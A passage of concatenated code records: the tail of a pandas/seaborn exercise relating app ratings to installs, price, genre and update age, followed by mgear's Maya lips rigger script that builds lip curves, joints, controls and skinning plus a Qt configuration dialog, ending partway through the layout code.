from sklearn.preprocessing import MinMaxScaler, LabelEncoder

#Code starts here

# Converting type of Installs column: strip "+" and "," then cast to int.
# (Single-character patterns are treated literally by pandas str.replace.)
data['Installs'].value_counts()
data['Installs'] = data['Installs'].str.replace('+','')
data['Installs'] = data['Installs'].str.replace(',', "")
data['Installs'] = data['Installs'].astype(int)

#Label Encoding
le = LabelEncoder()
le.fit(data['Installs'])
data['Installs'] = le.transform(data['Installs'])

#Finding correlation
plt.figure(figsize = (14,10))
a = sns.regplot(x = "Installs", y = 'Rating', data = data)
a.axes.set_title('Rating vs Installs [RegPlot]', fontsize = 20)
a.set_xlabel("Installs", fontsize = 18)
a.set_ylabel("Rating", fontsize = 18)
a.tick_params(labelsize = 8)

#Code ends here


# --------------
#Code starts here

# Converting type of price column to float: strip the "$" sign first.
data['Price'].value_counts()
data['Price'] = data['Price'].str.replace("$","")
data['Price'] = data['Price'].astype(float)

#Checking Correlation
plt.figure(figsize = (14,10))
a = sns.regplot(x = "Price", y = 'Rating', data = data)
a.axes.set_title('Rating vs Price [RegPlot]', fontsize = 20)
a.set_xlabel("Price", fontsize = 18)
a.set_ylabel("Rating", fontsize = 18)
a.tick_params(labelsize = 8)

#Code ends here


# --------------
#Code starts here

# Checking relation in between Genres and Rating: keep only the primary
# genre (text before the first ';').
data['Genres'].unique()
data['Genres'] = [genre.split(';')[0] for genre in data['Genres']]

# Mean rating per genre, sorted ascending; print the worst and best.
gr_mean = data.groupby('Genres', as_index = False)['Rating'].mean()
gr_mean.describe()
gr_mean = gr_mean.sort_values(by = 'Rating')
print(gr_mean.iloc[0], gr_mean.iloc[-1])

#Code ends here


# --------------
#Code starts here

# Comparing Rating and Last Updated: days since the most recent update.
data['Last Updated']
data['Last Updated'] = pd.to_datetime(data['Last Updated'])
max_date = data['Last Updated'].max()
data['Last Updated Days'] = (max_date - data['Last Updated']).dt.days

plt.figure(figsize = (14,10))
a = sns.regplot(x = "Last Updated Days", y = 'Rating', data = data)
a.set_xlabel('Last Updated Days', fontsize = 15)
a.set_ylabel('Rating', fontsize = 15)
a.axes.set_title('Rating vs Last Updated [RegPlot]')
a.tick_params(labelsize = 13)

#Code ends here
| 23.716418
| 90
| 0.684078
|
4a0e9b79e9b5b4ca5f82826061f422ac6807068f
| 40,666
|
py
|
Python
|
scripts/mgear/rigbits/facial_rigger/lips_rigger.py
|
stormstudios/rigbits
|
37ce738952a3cd31ba8a18b8989f5ea491d03bf0
|
[
"MIT"
] | 1
|
2020-08-11T01:17:19.000Z
|
2020-08-11T01:17:19.000Z
|
scripts/mgear/rigbits/facial_rigger/lips_rigger.py
|
stormstudios/rigbits
|
37ce738952a3cd31ba8a18b8989f5ea491d03bf0
|
[
"MIT"
] | null | null | null |
scripts/mgear/rigbits/facial_rigger/lips_rigger.py
|
stormstudios/rigbits
|
37ce738952a3cd31ba8a18b8989f5ea491d03bf0
|
[
"MIT"
] | null | null | null |
"""Rigbits lips rigger tool"""
import json
from functools import partial
import mgear.core.pyqt as gqt
import pymel.core as pm
from maya.app.general.mayaMixin import MayaQWidgetDockableMixin
from mgear.vendor.Qt import QtCore, QtWidgets
from pymel.core import datatypes
from mgear import rigbits
from mgear.core import meshNavigation, curve, applyop, primitive, icon
from mgear.core import transform, attribute, skin, vector
from . import lib
##########################################################
# Lips rig constructor
##########################################################
def rig(edge_loop="",
up_vertex="",
low_vertex="",
name_prefix="",
thickness=0.3,
do_skin=True,
rigid_loops=5,
falloff_loops=8,
head_joint=None,
jaw_joint=None,
parent_node=None,
control_name="ctl"):
######
# Var
######
FRONT_OFFSET = .02
NB_ROPE = 15
##################
# Helper functions
##################
def setName(name, side="C", idx=None):
namesList = [name_prefix, side, name]
if idx is not None:
namesList[1] = side + str(idx)
name = "_".join(namesList)
return name
###############
# Checkers
##############
# Loop
if edge_loop:
try:
edge_loop = [pm.PyNode(e) for e in edge_loop.split(",")]
except pm.MayaNodeError:
pm.displayWarning(
"Some of the edges listed in edge loop can not be found")
return
else:
pm.displayWarning("Please set the edge loop first")
return
# Vertex
if up_vertex:
try:
up_vertex = pm.PyNode(up_vertex)
except pm.MayaNodeError:
pm.displayWarning("%s can not be found" % up_vertex)
return
else:
pm.displayWarning("Please set the upper lip central vertex")
return
if low_vertex:
try:
low_vertex = pm.PyNode(low_vertex)
except pm.MayaNodeError:
pm.displayWarning("%s can not be found" % low_vertex)
return
else:
pm.displayWarning("Please set the lower lip central vertex")
return
# skinnign data
if do_skin:
if not head_joint:
pm.displayWarning("Please set the Head Jnt or unCheck Compute "
"Topological Autoskin")
return
else:
try:
head_joint = pm.PyNode(head_joint)
except pm.MayaNodeError:
pm.displayWarning(
"Head Joint: %s can not be found" % head_joint
)
return
if not jaw_joint:
pm.displayWarning("Please set the Jaw Jnt or unCheck Compute "
"Topological Autoskin")
return
else:
try:
jaw_joint = pm.PyNode(jaw_joint)
except pm.MayaNodeError:
pm.displayWarning("Jaw Joint: %s can not be found" % jaw_joint)
return
# check if the rig already exist in the current scene
if pm.ls(setName("root")):
pm.displayWarning("The object %s already exist in the scene. Please "
"choose another name prefix" % setName("root"))
return
#####################
# Root creation
#####################
lips_root = primitive.addTransform(None, setName("root"))
lipsCrv_root = primitive.addTransform(lips_root, setName("crvs"))
lipsRope_root = primitive.addTransform(lips_root, setName("rope"))
#####################
# Geometry
#####################
geo = pm.listRelatives(edge_loop[0], parent=True)[0]
#####################
# Groups
#####################
try:
ctlSet = pm.PyNode("rig_controllers_grp")
except pm.MayaNodeError:
pm.sets(n="rig_controllers_grp", em=True)
ctlSet = pm.PyNode("rig_controllers_grp")
try:
defset = pm.PyNode("rig_deformers_grp")
except pm.MayaNodeError:
pm.sets(n="rig_deformers_grp", em=True)
defset = pm.PyNode("rig_deformers_grp")
#####################
# Curves creation
#####################
# get extreme position using the outer loop
extr_v = meshNavigation.getExtremeVertexFromLoop(edge_loop)
upPos = extr_v[0]
lowPos = extr_v[1]
inPos = extr_v[2]
outPos = extr_v[3]
edgeList = extr_v[4]
vertexList = extr_v[5]
upPos = up_vertex
lowPos = low_vertex
# upper crv
upLip_edgeRange = meshNavigation.edgeRangeInLoopFromMid(edgeList,
upPos,
inPos,
outPos)
upCrv = curve.createCuveFromEdges(upLip_edgeRange,
setName("upperLip"),
parent=lipsCrv_root)
# store the closest vertex by curv cv index. To be use fo the auto skining
upLip_closestVtxList = []
# offset upper lip Curve
cvs = upCrv.getCVs(space="world")
for i, cv in enumerate(cvs):
closestVtx = meshNavigation.getClosestVertexFromTransform(geo, cv)
upLip_closestVtxList.append(closestVtx)
if i == 0:
# we know the curv starts from right to left
offset = [cv[0] - thickness, cv[1], cv[2] - thickness]
elif i == len(cvs) - 1:
offset = [cv[0] + thickness, cv[1], cv[2] - thickness]
else:
offset = [cv[0], cv[1] + thickness, cv[2]]
upCrv.setCV(i, offset, space='world')
# lower crv
lowLip_edgeRange = meshNavigation.edgeRangeInLoopFromMid(edgeList,
lowPos,
inPos,
outPos)
lowCrv = curve.createCuveFromEdges(lowLip_edgeRange,
setName("lowerLip"),
parent=lipsCrv_root)
lowLip_closestVtxList = []
# offset lower lip Curve
cvs = lowCrv.getCVs(space="world")
for i, cv in enumerate(cvs):
closestVtx = meshNavigation.getClosestVertexFromTransform(geo, cv)
lowLip_closestVtxList.append(closestVtx)
if i == 0:
# we know the curv starts from right to left
offset = [cv[0] - thickness, cv[1], cv[2] - thickness]
elif i == len(cvs) - 1:
offset = [cv[0] + thickness, cv[1], cv[2] - thickness]
else:
# we populate the closest vertext list here to skipt the first
# and latest point
offset = [cv[0], cv[1] - thickness, cv[2]]
lowCrv.setCV(i, offset, space='world')
upCrv_ctl = curve.createCurveFromCurve(upCrv,
setName("upCtl_crv"),
nbPoints=7,
parent=lipsCrv_root)
lowCrv_ctl = curve.createCurveFromCurve(lowCrv,
setName("lowCtl_crv"),
nbPoints=7,
parent=lipsCrv_root)
upRope = curve.createCurveFromCurve(upCrv,
setName("upRope_crv"),
nbPoints=NB_ROPE,
parent=lipsCrv_root)
lowRope = curve.createCurveFromCurve(lowCrv,
setName("lowRope_crv"),
nbPoints=NB_ROPE,
parent=lipsCrv_root)
upCrv_upv = curve.createCurveFromCurve(upCrv,
setName("upCrv_upv"),
nbPoints=7,
parent=lipsCrv_root)
lowCrv_upv = curve.createCurveFromCurve(lowCrv,
setName("lowCrv_upv"),
nbPoints=7,
parent=lipsCrv_root)
upRope_upv = curve.createCurveFromCurve(upCrv,
setName("upRope_upv"),
nbPoints=NB_ROPE,
parent=lipsCrv_root)
lowRope_upv = curve.createCurveFromCurve(lowCrv,
setName("lowRope_upv"),
nbPoints=NB_ROPE,
parent=lipsCrv_root)
# offset upv curves
for crv in [upCrv_upv, lowCrv_upv, upRope_upv, lowRope_upv]:
cvs = crv.getCVs(space="world")
for i, cv in enumerate(cvs):
# we populate the closest vertext list here to skipt the first
# and latest point
offset = [cv[0], cv[1], cv[2] + FRONT_OFFSET]
crv.setCV(i, offset, space='world')
rigCrvs = [upCrv,
lowCrv,
upCrv_ctl,
lowCrv_ctl,
upRope,
lowRope,
upCrv_upv,
lowCrv_upv,
upRope_upv,
lowRope_upv]
for crv in rigCrvs:
crv.attr("visibility").set(False)
##################
# Joints
##################
lvlType = "transform"
# upper joints
upperJoints = []
cvs = upCrv.getCVs(space="world")
pm.progressWindow(title='Creating Upper Joints', progress=0, max=len(cvs))
for i, cv in enumerate(cvs):
pm.progressWindow(e=True,
step=1,
status='\nCreating Joint for %s' % cv)
oTransUpV = pm.PyNode(pm.createNode(
lvlType,
n=setName("upLipRopeUpv", idx=str(i).zfill(3)),
p=lipsRope_root,
ss=True))
oTrans = pm.PyNode(
pm.createNode(lvlType,
n=setName("upLipRope", idx=str(i).zfill(3)),
p=lipsRope_root, ss=True))
oParam, oLength = curve.getCurveParamAtPosition(upRope, cv)
uLength = curve.findLenghtFromParam(upRope, oParam)
u = uLength / oLength
applyop.pathCns(
oTransUpV, upRope_upv, cnsType=False, u=u, tangent=False)
cns = applyop.pathCns(
oTrans, upRope, cnsType=False, u=u, tangent=False)
cns.setAttr("worldUpType", 1)
cns.setAttr("frontAxis", 0)
cns.setAttr("upAxis", 1)
pm.connectAttr(oTransUpV.attr("worldMatrix[0]"),
cns.attr("worldUpMatrix"))
# getting joint parent
if head_joint and isinstance(head_joint, (str, unicode)):
try:
j_parent = pm.PyNode(head_joint)
except pm.MayaNodeError:
j_parent = False
elif head_joint and isinstance(head_joint, pm.PyNode):
j_parent = head_joint
else:
j_parent = False
jnt = rigbits.addJnt(oTrans, noReplace=True, parent=j_parent)
upperJoints.append(jnt)
pm.sets(defset, add=jnt)
pm.progressWindow(e=True, endProgress=True)
# lower joints
lowerJoints = []
cvs = lowCrv.getCVs(space="world")
pm.progressWindow(title='Creating Lower Joints', progress=0, max=len(cvs))
for i, cv in enumerate(cvs):
pm.progressWindow(e=True,
step=1,
status='\nCreating Joint for %s' % cv)
oTransUpV = pm.PyNode(pm.createNode(
lvlType,
n=setName("lowLipRopeUpv", idx=str(i).zfill(3)),
p=lipsRope_root,
ss=True))
oTrans = pm.PyNode(pm.createNode(
lvlType,
n=setName("lowLipRope", idx=str(i).zfill(3)),
p=lipsRope_root,
ss=True))
oParam, oLength = curve.getCurveParamAtPosition(lowRope, cv)
uLength = curve.findLenghtFromParam(lowRope, oParam)
u = uLength / oLength
applyop.pathCns(oTransUpV,
lowRope_upv,
cnsType=False,
u=u,
tangent=False)
cns = applyop.pathCns(oTrans,
lowRope,
cnsType=False,
u=u,
tangent=False)
cns.setAttr("worldUpType", 1)
cns.setAttr("frontAxis", 0)
cns.setAttr("upAxis", 1)
pm.connectAttr(oTransUpV.attr("worldMatrix[0]"),
cns.attr("worldUpMatrix"))
# getting joint parent
if jaw_joint and isinstance(jaw_joint, (str, unicode)):
try:
j_parent = pm.PyNode(jaw_joint)
except pm.MayaNodeError:
pass
elif jaw_joint and isinstance(jaw_joint, pm.PyNode):
j_parent = jaw_joint
else:
j_parent = False
jnt = rigbits.addJnt(oTrans, noReplace=True, parent=j_parent)
lowerJoints.append(jnt)
pm.sets(defset, add=jnt)
pm.progressWindow(e=True, endProgress=True)
##################
# Controls
##################
# Controls lists
upControls = []
upVec = []
upNpo = []
lowControls = []
lowVec = []
lowNpo = []
# controls options
axis_list = ["sx", "sy", "sz", "ro"]
upCtlOptions = [["corner", "R", "square", 4, .05, axis_list],
["upOuter", "R", "circle", 14, .03, []],
["upInner", "R", "circle", 14, .03, []],
["upper", "C", "square", 4, .05, axis_list],
["upInner", "L", "circle", 14, .03, []],
["upOuter", "L", "circle", 14, .03, []],
["corner", "L", "square", 4, .05, axis_list]]
lowCtlOptions = [["lowOuter", "R", "circle", 14, .03, []],
["lowInner", "R", "circle", 14, .03, []],
["lower", "C", "square", 4, .05, axis_list],
["lowInner", "L", "circle", 14, .03, []],
["lowOuter", "L", "circle", 14, .03, []]]
params = ["tx", "ty", "tz", "rx", "ry", "rz"]
# upper controls
cvs = upCrv_ctl.getCVs(space="world")
pm.progressWindow(title='Upper controls', progress=0, max=len(cvs))
v0 = transform.getTransformFromPos(cvs[0])
v1 = transform.getTransformFromPos(cvs[-1])
distSize = vector.getDistance(v0, v1) * 3
for i, cv in enumerate(cvs):
pm.progressWindow(e=True,
step=1,
status='\nCreating control for%s' % cv)
t = transform.getTransformFromPos(cv)
# Get nearest joint for orientation of controls
joints = upperJoints + lowerJoints
nearest_joint = None
nearest_distance = None
for joint in joints:
distance = vector.getDistance(
transform.getTranslation(joint),
cv
)
if distance < nearest_distance or nearest_distance is None:
nearest_distance = distance
nearest_joint = joint
if nearest_joint:
t = transform.setMatrixPosition(
transform.getTransform(nearest_joint), cv
)
temp = primitive.addTransform(
lips_root, setName("temp"), t
)
temp.rx.set(0)
t = transform.getTransform(temp)
pm.delete(temp)
oName = upCtlOptions[i][0]
oSide = upCtlOptions[i][1]
o_icon = upCtlOptions[i][2]
color = upCtlOptions[i][3]
wd = upCtlOptions[i][4]
oPar = upCtlOptions[i][5]
npo = primitive.addTransform(lips_root,
setName("%s_npo" % oName, oSide),
t)
upNpo.append(npo)
ctl = icon.create(npo,
setName("%s_%s" % (oName, control_name), oSide),
t,
icon=o_icon,
w=wd * distSize,
d=wd * distSize,
ro=datatypes.Vector(1.57079633, 0, 0),
po=datatypes.Vector(0, 0, .07 * distSize),
color=color)
upControls.append(ctl)
name_split = control_name.split("_")
if len(name_split) == 2 and name_split[-1] == "ghost":
pass
else:
pm.sets(ctlSet, add=ctl)
attribute.addAttribute(ctl, "isCtl", "bool", keyable=False)
attribute.setKeyableAttributes(ctl, params + oPar)
upv = primitive.addTransform(ctl, setName("%s_upv" % oName, oSide), t)
upv.attr("tz").set(FRONT_OFFSET)
upVec.append(upv)
if oSide == "R":
npo.attr("sx").set(-1)
pm.progressWindow(e=True, endProgress=True)
# lower controls
cvs = lowCrv_ctl.getCVs(space="world")
pm.progressWindow(title='Lower controls', progress=0, max=len(cvs))
for i, cv in enumerate(cvs[1:-1]):
pm.progressWindow(e=True,
step=1,
status='\nCreating control for%s' % cv)
t = transform.getTransformFromPos(cv)
# Get nearest joint for orientation of controls
joints = upperJoints + lowerJoints
nearest_joint = None
nearest_distance = None
for joint in joints:
distance = vector.getDistance(
transform.getTranslation(joint),
cv
)
if distance < nearest_distance or nearest_distance is None:
nearest_distance = distance
nearest_joint = joint
if nearest_joint:
t = transform.setMatrixPosition(
transform.getTransform(nearest_joint), cv
)
temp = primitive.addTransform(
lips_root, setName("temp"), t
)
temp.rx.set(0)
t = transform.getTransform(temp)
pm.delete(temp)
oName = lowCtlOptions[i][0]
oSide = lowCtlOptions[i][1]
o_icon = lowCtlOptions[i][2]
color = lowCtlOptions[i][3]
wd = lowCtlOptions[i][4]
oPar = lowCtlOptions[i][5]
npo = primitive.addTransform(lips_root,
setName("%s_npo" % oName, oSide),
t)
lowNpo.append(npo)
ctl = icon.create(npo,
setName("%s_%s" % (oName, control_name), oSide),
t,
icon=o_icon,
w=wd * distSize,
d=wd * distSize,
ro=datatypes.Vector(1.57079633, 0, 0),
po=datatypes.Vector(0, 0, .07 * distSize),
color=color)
lowControls.append(ctl)
name_split = control_name.split("_")
if len(name_split) == 2 and control_name.split("_")[-1] == "ghost":
pass
else:
pm.sets(ctlSet, add=ctl)
attribute.addAttribute(ctl, "isCtl", "bool", keyable=False)
attribute.setKeyableAttributes(ctl, params + oPar)
upv = primitive.addTransform(ctl, setName("%s_upv" % oName, oSide), t)
upv.attr("tz").set(FRONT_OFFSET)
lowVec.append(upv)
if oSide == "R":
npo.attr("sx").set(-1)
pm.progressWindow(e=True, endProgress=True)
# reparentig controls
pm.parent(upNpo[1], lowNpo[0], upControls[0])
pm.parent(upNpo[2], upNpo[4], upControls[3])
pm.parent(upNpo[-2], lowNpo[-1], upControls[-1])
pm.parent(lowNpo[1], lowNpo[3], lowControls[2])
# Connecting control crvs with controls
applyop.gear_curvecns_op(upCrv_ctl, upControls)
applyop.gear_curvecns_op(lowCrv_ctl,
[upControls[0]] + lowControls + [upControls[-1]])
applyop.gear_curvecns_op(upCrv_upv, upVec)
applyop.gear_curvecns_op(lowCrv_upv, [upVec[0]] + lowVec + [upVec[-1]])
# adding wires
pm.wire(upCrv, w=upCrv_ctl, dropoffDistance=[0, 1000])
pm.wire(lowCrv, w=lowCrv_ctl, dropoffDistance=[0, 1000])
pm.wire(upRope, w=upCrv_ctl, dropoffDistance=[0, 1000])
pm.wire(lowRope, w=lowCrv_ctl, dropoffDistance=[0, 1000])
pm.wire(upRope_upv, w=upCrv_upv, dropoffDistance=[0, 1000])
pm.wire(lowRope_upv, w=lowCrv_upv, dropoffDistance=[0, 1000])
# setting constrains
# up
cns_node = pm.parentConstraint(upControls[0],
upControls[3],
upControls[1].getParent(),
mo=True,
skipRotate=["x", "y", "z"])
cns_node.attr(upControls[0].name() + "W0").set(.75)
cns_node.attr(upControls[3].name() + "W1").set(.25)
cns_node = pm.parentConstraint(upControls[0],
upControls[3],
upControls[2].getParent(),
mo=True,
skipRotate=["x", "y", "z"])
cns_node.attr(upControls[0].name() + "W0").set(.25)
cns_node.attr(upControls[3].name() + "W1").set(.75)
cns_node = pm.parentConstraint(upControls[3],
upControls[6],
upControls[4].getParent(),
mo=True,
skipRotate=["x", "y", "z"])
cns_node.attr(upControls[3].name() + "W0").set(.75)
cns_node.attr(upControls[6].name() + "W1").set(.25)
cns_node = pm.parentConstraint(upControls[3],
upControls[6],
upControls[5].getParent(),
mo=True,
skipRotate=["x", "y", "z"])
cns_node.attr(upControls[3].name() + "W0").set(.25)
cns_node.attr(upControls[6].name() + "W1").set(.75)
# low
cns_node = pm.parentConstraint(upControls[0],
lowControls[2],
lowControls[0].getParent(),
mo=True,
skipRotate=["x", "y", "z"])
cns_node.attr(upControls[0].name() + "W0").set(.75)
cns_node.attr(lowControls[2].name() + "W1").set(.25)
cns_node = pm.parentConstraint(upControls[0],
lowControls[2],
lowControls[1].getParent(),
mo=True,
skipRotate=["x", "y", "z"])
cns_node.attr(upControls[0].name() + "W0").set(.25)
cns_node.attr(lowControls[2].name() + "W1").set(.75)
cns_node = pm.parentConstraint(lowControls[2],
upControls[6],
lowControls[3].getParent(),
mo=True,
skipRotate=["x", "y", "z"])
cns_node.attr(lowControls[2].name() + "W0").set(.75)
cns_node.attr(upControls[6].name() + "W1").set(.25)
cns_node = pm.parentConstraint(lowControls[2],
upControls[6],
lowControls[4].getParent(),
mo=True,
skipRotate=["x", "y", "z"])
cns_node.attr(lowControls[2].name() + "W0").set(.25)
cns_node.attr(upControls[6].name() + "W1").set(.75)
###########################################
# Connecting rig
###########################################
if parent_node:
try:
if isinstance(parent_node, basestring):
parent_node = pm.PyNode(parent_node)
parent_node.addChild(lips_root)
except pm.MayaNodeError:
pm.displayWarning("The Lips rig can not be parent to: %s. Maybe "
"this object doesn't exist." % parent_node)
if head_joint and jaw_joint:
try:
if isinstance(head_joint, basestring):
head_joint = pm.PyNode(head_joint)
except pm.MayaNodeError:
pm.displayWarning("Head Joint or Upper Lip Joint %s. Can not be "
"fount in the scene" % head_joint)
return
try:
if isinstance(jaw_joint, basestring):
jaw_joint = pm.PyNode(jaw_joint)
except pm.MayaNodeError:
pm.displayWarning("Jaw Joint or Lower Lip Joint %s. Can not be "
"fount in the scene" % jaw_joint)
return
# in order to avoid flips lets create a reference transform
ref_cns_list = []
for cns_ref in [head_joint, jaw_joint]:
t = transform.getTransformFromPos(
cns_ref.getTranslation(space='world'))
ref = pm.createNode("transform",
n=cns_ref.name() + "_cns",
p=cns_ref,
ss=True)
ref.setMatrix(t, worldSpace=True)
ref_cns_list.append(ref)
# right corner connection
pm.parentConstraint(ref_cns_list[0],
ref_cns_list[1],
upControls[0].getParent(),
mo=True)
# left corner connection
pm.parentConstraint(ref_cns_list[0],
ref_cns_list[1],
upControls[-1].getParent(),
mo=True)
# up control connection
pm.parentConstraint(head_joint,
upControls[3].getParent(),
mo=True)
# low control connection
pm.parentConstraint(jaw_joint,
lowControls[2].getParent(),
mo=True)
###########################################
# Auto Skinning
###########################################
if do_skin:
# eyelid vertex rows
totalLoops = rigid_loops + falloff_loops
vertexLoopList = meshNavigation.getConcentricVertexLoop(vertexList,
totalLoops)
vertexRowList = meshNavigation.getVertexRowsFromLoops(vertexLoopList)
# we set the first value 100% for the first initial loop
skinPercList = [1.0]
# we expect to have a regular grid topology
for r in range(rigid_loops):
for rr in range(2):
skinPercList.append(1.0)
increment = 1.0 / float(falloff_loops)
# we invert to smooth out from 100 to 0
inv = 1.0 - increment
for r in range(falloff_loops):
for rr in range(2):
if inv < 0.0:
inv = 0.0
skinPercList.append(inv)
inv -= increment
# this loop add an extra 0.0 indices to avoid errors
for r in range(10):
for rr in range(2):
skinPercList.append(0.0)
# base skin
if head_joint:
try:
head_joint = pm.PyNode(head_joint)
except pm.MayaNodeError:
pm.displayWarning(
"Auto skin aborted can not find %s " % head_joint)
return
# Check if the object has a skinCluster
objName = pm.listRelatives(geo, parent=True)[0]
skinCluster = skin.getSkinCluster(objName)
if not skinCluster:
skinCluster = pm.skinCluster(head_joint,
geo,
tsb=True,
nw=2,
n='skinClsEyelid')
lipsJoints = upperJoints + lowerJoints
closestVtxList = upLip_closestVtxList + lowLip_closestVtxList
pm.progressWindow(title='Auto skinning process',
progress=0,
max=len(lipsJoints))
for i, jnt in enumerate(lipsJoints):
pm.progressWindow(e=True, step=1, status='\nSkinning %s' % jnt)
skinCluster.addInfluence(jnt, weight=0)
v = closestVtxList[i]
for row in vertexRowList:
if v in row:
for i, rv in enumerate(row):
# find the deformer with max value for each vertex
w = pm.skinPercent(skinCluster,
rv,
query=True,
value=True)
transJoint = pm.skinPercent(skinCluster,
rv,
query=True,
t=None)
max_value = max(w)
max_index = w.index(max_value)
perc = skinPercList[i]
t_value = [(jnt, perc),
(transJoint[max_index], 1.0 - perc)]
pm.skinPercent(skinCluster,
rv,
transformValue=t_value)
pm.progressWindow(e=True, endProgress=True)
##########################################################
# Lips Rig UI
##########################################################
class ui(MayaQWidgetDockableMixin, QtWidgets.QDialog):
    """Dockable dialog to configure and build the lips rig.

    Gathers geometry inputs (an edge loop plus upper/lower corner
    vertices), naming options, joints and auto-skin settings, and calls
    ``rig`` with the collected values.  Settings can also be exported
    to / imported from a ``.lips`` json file.
    """
    valueChanged = QtCore.Signal(int)
    def __init__(self, parent=None):
        super(ui, self).__init__(parent)
        # File-dialog filter used by import/export of the configuration.
        self.filter = "Lips Rigger Configuration .lips (*.lips)"
        self.create()
    def create(self):
        """Configure the window, then build widgets, layout and signals."""
        self.setWindowTitle("Lips Rigger")
        self.setWindowFlags(QtCore.Qt.Window)
        self.setAttribute(QtCore.Qt.WA_DeleteOnClose, 1)
        self.create_controls()
        self.create_layout()
        self.create_connections()
    def create_controls(self):
        """Instantiate all widgets; layout is done in ``create_layout``."""
        # Geometry input controls
        self.geometryInput_group = QtWidgets.QGroupBox("Geometry Input")
        self.edgedge_loop_label = QtWidgets.QLabel("Edge Loop:")
        self.edge_loop = QtWidgets.QLineEdit()
        self.edge_loop_button = QtWidgets.QPushButton("<<")
        self.up_vertex_label = QtWidgets.QLabel("Upper Vertex:")
        self.up_vertex = QtWidgets.QLineEdit()
        self.up_vertex_button = QtWidgets.QPushButton("<<")
        self.low_vertex_label = QtWidgets.QLabel("Lower Vertex:")
        self.low_vertex = QtWidgets.QLineEdit()
        self.low_vertex_button = QtWidgets.QPushButton("<<")
        # Name prefix
        self.prefix_group = QtWidgets.QGroupBox("Name Prefix")
        self.name_prefix = QtWidgets.QLineEdit()
        self.name_prefix.setText("lips")
        # control extension
        self.control_group = QtWidgets.QGroupBox("Control Name Extension")
        self.control_name = QtWidgets.QLineEdit()
        self.control_name.setText("ctl")
        # joints
        self.joints_group = QtWidgets.QGroupBox("Joints")
        self.head_joint_label = QtWidgets.QLabel("Head or Upper Lip Joint:")
        self.head_joint = QtWidgets.QLineEdit()
        self.head_joint_button = QtWidgets.QPushButton("<<")
        self.jaw_joint_label = QtWidgets.QLabel("Jaw or Lower Lip Joint:")
        self.jaw_joint = QtWidgets.QLineEdit()
        self.jaw_joint_button = QtWidgets.QPushButton("<<")
        # Topological Autoskin
        self.topoSkin_group = QtWidgets.QGroupBox("Skin")
        self.rigid_loops_label = QtWidgets.QLabel("Rigid Loops:")
        self.rigid_loops = QtWidgets.QSpinBox()
        self.rigid_loops.setRange(0, 30)
        self.rigid_loops.setSingleStep(1)
        self.rigid_loops.setValue(5)
        self.falloff_loops_label = QtWidgets.QLabel("Falloff Loops:")
        self.falloff_loops = QtWidgets.QSpinBox()
        self.falloff_loops.setRange(0, 30)
        self.falloff_loops.setSingleStep(1)
        self.falloff_loops.setValue(8)
        self.do_skin = QtWidgets.QCheckBox(
            'Compute Topological Autoskin')
        self.do_skin.setChecked(True)
        # Options
        self.options_group = QtWidgets.QGroupBox("Options")
        self.thickness_label = QtWidgets.QLabel("Lips Thickness:")
        self.thickness = QtWidgets.QDoubleSpinBox()
        self.thickness.setRange(0, 10)
        self.thickness.setSingleStep(.01)
        self.thickness.setValue(.03)
        self.parent_label = QtWidgets.QLabel("Static Rig Parent:")
        self.parent_node = QtWidgets.QLineEdit()
        self.parent_button = QtWidgets.QPushButton("<<")
        # Build button
        self.build_button = QtWidgets.QPushButton("Build Lips Rig")
        self.import_button = QtWidgets.QPushButton("Import Config from json")
        self.export_button = QtWidgets.QPushButton("Export Config to json")
    def create_layout(self):
        """Arrange the widgets created in ``create_controls``."""
        # Edge Loop Layout
        edgedge_loop_layout = QtWidgets.QHBoxLayout()
        edgedge_loop_layout.setContentsMargins(1, 1, 1, 1)
        edgedge_loop_layout.addWidget(self.edgedge_loop_label)
        edgedge_loop_layout.addWidget(self.edge_loop)
        edgedge_loop_layout.addWidget(self.edge_loop_button)
        # Outer Edge Loop Layout
        up_vertex_layout = QtWidgets.QHBoxLayout()
        up_vertex_layout.setContentsMargins(1, 1, 1, 1)
        up_vertex_layout.addWidget(self.up_vertex_label)
        up_vertex_layout.addWidget(self.up_vertex)
        up_vertex_layout.addWidget(self.up_vertex_button)
        # inner Edge Loop Layout
        low_vertex_layout = QtWidgets.QHBoxLayout()
        low_vertex_layout.setContentsMargins(1, 1, 1, 1)
        low_vertex_layout.addWidget(self.low_vertex_label)
        low_vertex_layout.addWidget(self.low_vertex)
        low_vertex_layout.addWidget(self.low_vertex_button)
        # Geometry Input Layout
        geometryInput_layout = QtWidgets.QVBoxLayout()
        geometryInput_layout.setContentsMargins(6, 1, 6, 2)
        geometryInput_layout.addLayout(edgedge_loop_layout)
        geometryInput_layout.addLayout(up_vertex_layout)
        geometryInput_layout.addLayout(low_vertex_layout)
        self.geometryInput_group.setLayout(geometryInput_layout)
        # joints Layout
        head_joint_layout = QtWidgets.QHBoxLayout()
        head_joint_layout.addWidget(self.head_joint_label)
        head_joint_layout.addWidget(self.head_joint)
        head_joint_layout.addWidget(self.head_joint_button)
        jaw_joint_layout = QtWidgets.QHBoxLayout()
        jaw_joint_layout.addWidget(self.jaw_joint_label)
        jaw_joint_layout.addWidget(self.jaw_joint)
        jaw_joint_layout.addWidget(self.jaw_joint_button)
        joints_layout = QtWidgets.QVBoxLayout()
        joints_layout.setContentsMargins(6, 4, 6, 4)
        joints_layout.addLayout(head_joint_layout)
        joints_layout.addLayout(jaw_joint_layout)
        self.joints_group.setLayout(joints_layout)
        # topological autoskin Layout
        skinLoops_layout = QtWidgets.QGridLayout()
        skinLoops_layout.addWidget(self.rigid_loops_label, 0, 0)
        skinLoops_layout.addWidget(self.falloff_loops_label, 0, 1)
        skinLoops_layout.addWidget(self.rigid_loops, 1, 0)
        skinLoops_layout.addWidget(self.falloff_loops, 1, 1)
        topoSkin_layout = QtWidgets.QVBoxLayout()
        topoSkin_layout.setContentsMargins(6, 4, 6, 4)
        topoSkin_layout.addWidget(self.do_skin,
                                  alignment=QtCore.Qt.Alignment())
        topoSkin_layout.addLayout(skinLoops_layout)
        # NOTE(review): head_joint_layout/jaw_joint_layout were already
        # added to joints_layout above; Qt reparents a layout when it is
        # added to a second parent, so they end up in this group only —
        # confirm which group box is intended to show the joint fields.
        topoSkin_layout.addLayout(head_joint_layout)
        topoSkin_layout.addLayout(jaw_joint_layout)
        self.topoSkin_group.setLayout(topoSkin_layout)
        # Options Layout
        lipThickness_layout = QtWidgets.QHBoxLayout()
        lipThickness_layout.addWidget(self.thickness_label)
        lipThickness_layout.addWidget(self.thickness)
        parent_layout = QtWidgets.QHBoxLayout()
        parent_layout.addWidget(self.parent_label)
        parent_layout.addWidget(self.parent_node)
        parent_layout.addWidget(self.parent_button)
        options_layout = QtWidgets.QVBoxLayout()
